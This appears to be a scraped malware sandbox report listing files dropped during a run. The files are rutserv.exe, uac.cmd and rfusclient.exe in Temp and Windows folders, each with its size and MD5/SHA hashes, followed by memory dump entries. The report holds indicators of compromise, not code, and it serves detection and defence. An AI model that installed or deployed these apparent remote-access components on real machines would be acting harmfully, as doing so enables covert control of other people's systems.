aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\rutserv.exe
Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\uac.cmd
Filesize
10KB

MD5
09bf5a799d46c218ee4d99b9083800ac

SHA1
05927f2aa870eefc12c2883600502e6ed2ff37e5

SHA256
4cbdb4d4bad628128557ff0625f7ecc73801f5ed2324d731c1c70c70ea469e96

SHA512
244a992bb21053ee9045df6f4d6f82d1119859d145c0867badbb1f4af1dd38bfd7105fb0584199098663a019b29db74b649279c946a75b48646707bedbdd4654

Download Submit
C:\Windows\spom\rfusclient.exe
Filesize
1.8MB

MD5
3afec4347159849e4ef50d179ff1fed7

SHA1
9b3e00d0a426c622ddc34fbee96595d41bd8db72

SHA256
7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f

SHA512
aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

Download Submit
C:\Windows\spom\rutserv.exe
Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Windows\spom\rutserv.exe
Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Windows\spom\rutserv.exe
Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Windows\spom\rutserv.exe
Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Windows\spom\rutserv.exe
Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
memory/2152-132-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/2152-137-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/2244-144-0x0000000000000000-mapping.dmp

Download
memory/2444-164-0x0000000000000000-mapping.dmp

Download
memory/2584-160-0x0000000000000000-mapping.dmp

Download
memory/2620-139-0x0000000000000000-mapping.dmp

Download
memory/2820-143-0x0000000000000000-mapping.dmp

Download
memory/2860-153-0x0000000000000000-mapping.dmp

Download
memory/3096-145-0x0000000000000000-mapping.dmp

Download
memory/3224-159-0x0000000000000000-mapping.dmp

Download
memory/3276-146-0x0000000000000000-mapping.dmp

Download
memory/3488-148-0x0000000000000000-mapping.dmp

Download
memory/3532-158-0x0000000000000000-mapping.dmp

Download
memory/3728-163-0x0000000000000000-mapping.dmp

Download
memory/3804-162-0x0000000000000000-mapping.dmp

Download
memory/3852-133-0x0000000000000000-mapping.dmp

Download
memory/3856-136-0x0000000000000000-mapping.dmp

Download
memory/4316-141-0x0000000000000000-mapping.dmp

Download
memory/4528-142-0x0000000000000000-mapping.dmp

Download
memory/4724-147-0x0000000000000000-mapping.dmp

Download
memory/4776-156-0x0000000000000000-mapping.dmp

Download
memory/4884-161-0x0000000000000000-mapping.dmp

Download
memory/4916-165-0x0000000000000000-mapping.dmp

Download